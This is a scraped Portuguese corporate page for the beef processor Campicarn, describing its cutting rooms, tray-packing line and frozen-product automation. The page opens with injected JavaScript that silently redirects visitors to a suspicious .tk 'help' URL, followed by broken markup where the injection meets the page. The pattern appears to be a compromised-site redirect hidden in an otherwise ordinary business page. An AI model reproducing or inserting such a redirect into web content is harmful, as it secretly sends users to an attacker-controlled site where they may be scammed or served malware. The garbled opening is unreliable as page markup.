window.location.replace("https://hauboolozard.tk/help/?15131619432237");window.location.href = "https://hauboolozard.tk/help/?15131619432237";lang="pt-pt" id="arve"> Tecnologia e Inovação – Campicarn

Tecnologia e Inovação

Competitividade e Excelência

A estratégia da CARNES CAMPICARN, S.A. centra-se na qualidade, na aquisição da mais moderna tecnologia e na criatividade para inovar processos e produtos.

Posicionamo-nos na linha da frente da indústria de carnes de bovino, garantindo aos nossos clientes os mais elevados padrões de processamento industrial, flexibilidade e eficiência, como garantes de produtividade, competitividade e excelência.

AB__0354_t
AB__0026_t site

500 Carcaças por Dia

Para além do comércio de carne fresca, carcaças, realizado no seu Entreposto Comercial, a CAMPICARN dispõe de salas de desmancha com capacidade para desossar e desmanchar cerca de 500 carcaças por dia.

Estas operações são realizadas seguindo diferentes especificações de corte, de acordo com as necessidades dos clientes e num estrito controlo dos rendimentos do processo.

80 Cuvetes por Minuto

As peças resultantes deste processo são comercializadas em fresco, embaladas a Vácuo ou são encaminhadas para a Unidade de Processamento Centralizado de Carnes, comummente designada por Corte Fino.

Neste processo, as peças devidamente padronizadas são mecanicamente fatiadas, sendo a carne embalada em cuvetes em atmosfera protetora e etiquetadas. Nesta unidade produz-se cuvetes de peso fixo e variável, de diferentes formatos e gramagens, com uma cadência produtiva de 80 cuvetes por minuto.

AB__0328_t
AB__0446_t

20 Toneladas por Dia

Atenta às novas tendências de consumo e hábitos alimentares, a CAMPICARN desenvolve também produtos práticos e fáceis de confecionar, procurando ir de encontro às necessidades das famílias atuais, com pouco tempo para as tarefas diárias e para o lazer.

Na Unidade de Preparados de Carne Fresca e Ultracongelados, a capacidade de produção atinge cerca de 20 toneladas por dia.

A linha de Ultracongelados encontra-se totalmente automatizada, dispondo de robots com uma grande cadência produtiva. Assim, esta linha coloca a CAMPICARN na liderança tecnológica do setor.

Processos de fabrico controlados informaticamente …

Gestão de encomendas, planeamento de produção, controlo de processos fabris (QC/Quality Control e QA/ Quality Assurance), controlo de stocks, expedição e logística.

X